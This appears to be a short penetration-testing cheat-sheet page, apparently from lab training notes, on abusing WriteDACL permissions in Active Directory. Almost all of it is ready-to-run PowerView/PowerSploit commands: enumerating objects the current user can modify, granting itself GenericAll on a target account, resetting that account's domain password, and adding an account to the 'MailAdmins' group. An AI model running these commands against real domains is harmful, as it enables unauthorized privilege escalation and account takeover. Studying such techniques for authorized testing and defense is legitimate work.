WriteDACL

Enumerate users that we have WriteDACL access to

Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

Give ourselves the GenericAll access right to the TestService2 object

Add-DomainObjectAcl -TargetIdentity testservice2 -PrincipalIdentity offsec -Rights All

Verify that GenericAll was applied correctly

Get-ObjectAcl -Identity testservice2 -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}

Let’s proceed to change its password

net user testservice2 h4x /domain

WriteDACL access right is just as powerful as GenericAll

Example

Give ourselves full rights to object due to WriteDACL (using PowerSploit)

Add-DomainObjectAcl -TargetIdentity "MailAdmins" -Rights All -PrincipalIdentity 'sqlsvc' -Verbose

Add ourselves to group

Add-DomainGroupMember -Identity "MailAdmins" -Members 'sqlsvc' -Verbose

Last updated 2 years ago